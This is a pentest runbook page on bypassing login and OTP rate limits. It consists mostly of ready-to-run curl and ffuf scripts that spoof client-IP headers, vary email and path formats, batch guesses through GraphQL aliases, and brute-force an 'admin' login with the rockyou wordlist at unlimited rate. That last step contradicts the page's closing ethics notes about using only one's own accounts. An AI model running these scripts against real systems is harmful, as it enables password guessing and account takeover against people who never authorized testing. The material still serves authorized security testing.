Webupdated Oct 1, 2026

Rate Limit Bypass

Circumventing throttling on logins, OTPs, and APIs using header spoofing, format tricks, and protocol-level parallelism.

toolbox:ffufcurlburp suite

A rate-limit bypass runbook for bug bounty / authorized pentest on in-scope targets only. Goal: identify how the limiter keys requests, vary that key so an attack is no longer counted, and prove it on your own account.

1. Identify the limiter key

for i in $(seq 1 15); do
  curl -s -o /dev/null -w "$i: %{http_code}\n" -X POST \
    "https://target.com/api/login" \
    -H "Content-Type: application/json" \
    -d '{"user":"me@test.com","pass":"wrong"}'
done

Note the block status and whether the limit is per IP, session, username, or endpoint.

2. Header spoofing

for i in $(seq 1 50); do
  curl -s -o /dev/null -w '%{http_code} ' -X POST \
    "https://target.com/api/login" \
    -H "X-Forwarded-For: 10.0.0.$i" -H "X-Real-IP: 10.0.0.$i" \
    -d 'user=me@test.com&pass=wrong'
done; echo

Also try chained lists, Forwarded, True-Client-IP, and X-Client-IP.

3. Parameter and format variation

for e in "user@test.com" "User@test.com" "user@test.com." \
         "user+1@test.com" "user+2@test.com"; do
  curl -s -o /dev/null -w "$e -> %{http_code}\n" -X POST \
    "https://target.com/api/login" -d "user=$e&pass=wrong"
done

4. Path and case tricks

for p in "/login" "/Login" "/LOGIN" "/login/" "/login?" "/login#"; do
  curl -s -o /dev/null -w "$p -> %{http_code}\n" -X POST \
    "https://target.com$p" -d 'user=me@test.com&pass=wrong'
done

5. Protocol-level parallelism

# GraphQL aliases bypass per-operation limits
curl -s -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation{a:login(u:\"admin\",p:\"1\") b:login(u:\"admin\",p:\"2\") c:login(u:\"admin\",p:\"3\")}"}'

# HTTP/2 multiplexing with connection reuse
ffuf -u "https://target.com/api/login" -X POST \
  -H "Content-Type: application/json" \
  -d '{"user":"admin","pass":"FUZZ"}' \
  -w /usr/share/wordlists/rockyou.txt -mc all -fs 0 -rate 0 -p 0.0

6. Measure the bypass

  • Compare attempts allowed with and without the technique.
  • Confirm the login/OTP actually validates attempts, not just that requests are sent.
  • Stop as soon as the counter is clearly defeated.

Full pipeline

TARGET="https://target.com"
for i in $(seq 1 15); do
  curl -s -o /dev/null -w "$i:%{http_code} " -X POST "$TARGET/api/login" \
    -H "Content-Type: application/json" -d '{"user":"me@test.com","pass":"wrong"}'
done; echo
for i in $(seq 1 50); do
  curl -s -o /dev/null -w '%{http_code} ' -X POST "$TARGET/api/login" \
    -H "X-Forwarded-For: 10.0.0.$i" -H "X-Real-IP: 10.0.0.$i" \
    -d 'user=me@test.com&pass=wrong'
done; echo
for e in "user@test.com" "User@test.com" "user@test.com." "user+1@test.com"; do
  curl -s -o /dev/null -w "$e -> %{http_code}\n" -X POST \
    "$TARGET/api/login" -d "user=$e&pass=wrong"
done
for p in "/login" "/Login" "/LOGIN" "/login/" "/login?"; do
  curl -s -o /dev/null -w "$p -> %{http_code}\n" -X POST \
    "$TARGET$p" -d 'user=me@test.com&pass=wrong'
done

Ethics & legality

  • Only brute force accounts and endpoints covered by the authorized scope.
  • Use your own test accounts; never attempt real credential stuffing.
  • Stop the moment the bypass is proven — do not run to completion.
  • Respect any program rules about request volume and forbidden techniques.